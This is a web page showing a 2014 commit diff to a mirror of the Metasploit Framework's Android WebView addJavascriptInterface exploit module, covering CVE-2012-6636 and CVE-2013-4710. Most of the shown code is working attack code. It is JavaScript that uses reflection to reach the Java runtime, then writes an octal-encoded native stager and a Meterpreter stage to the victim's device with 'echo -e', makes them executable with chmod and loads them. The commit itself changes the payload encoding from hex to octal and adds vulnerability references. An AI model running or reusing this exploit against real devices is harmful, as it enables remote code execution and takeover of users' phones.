infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use octal encoding and -e, so that echo always works.

bug/bundler_fix
Joe Vennix 2014-04-17 01:17:42 -05:00
parent fc841331d2
commit 8920e0cc80
No known key found for this signature in database
GPG Key ID: 127B05FB3E85A2B0
1 changed files with 9 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
modules/exploits/android/browser/webview_addjavascriptinterface.rb
View File

@ -69,7 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
['URL', 'http://50.56.33.56/blog/?p=314'],
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
['CVE', '2012-6636'], # original CVE for addJavascriptInterface
['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
['EDB', '31519'],
['OSVDB', '97520']
],
'Platform' => 'android',
'Arch' => ARCH_DALVIK,
@ -89,8 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote
def on_request_uri(cli, req)
if req.uri =~ /\.js/
serve_static_js(cli, req)
elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100
print_warning "Received message: #{req.body}"
else
super
end
@ -139,28 +141,15 @@ class Metasploit3 < Msf::Exploit::Remote
.getMethod('getRuntime', null)
.invoke(null, null);
// now ensure we can write out a hex-encoded byte with the shell's echo builtin
var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']);
if (byte.indexOf("\\\\") > -1) {
// if youre havin byte problems
var xml = new XMLHttpRequest();
// i feel bad for you son
xml.open('POST', '#{get_module_resource}.msg', false);
// i got \\x63 problems
xml.send("Unsupported shell echo builtin: exploit aborted.");
// but your shell aint one
return true;
}
// libraryData contains the bytes for a native shared object built via NDK
// which will load the "stage", which in this case is our android meterpreter stager.
// LibraryData is loaded via ajax later, because we have to access javascript in
// order to detect what arch we are running.
var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}";
var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
// the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
// another stager which loads android meterpreter from the msf handler.
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
@ -170,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote
var stagePath = path + '/#{stagename}.apk';
// build the library and chmod it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
runtime.exec(['chmod', '700', libraryPath]).waitFor();
// build the stage, chmod it, and load it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['chmod', '700', stagePath]).waitFor();
// load the library (this fails in x86, figure out why)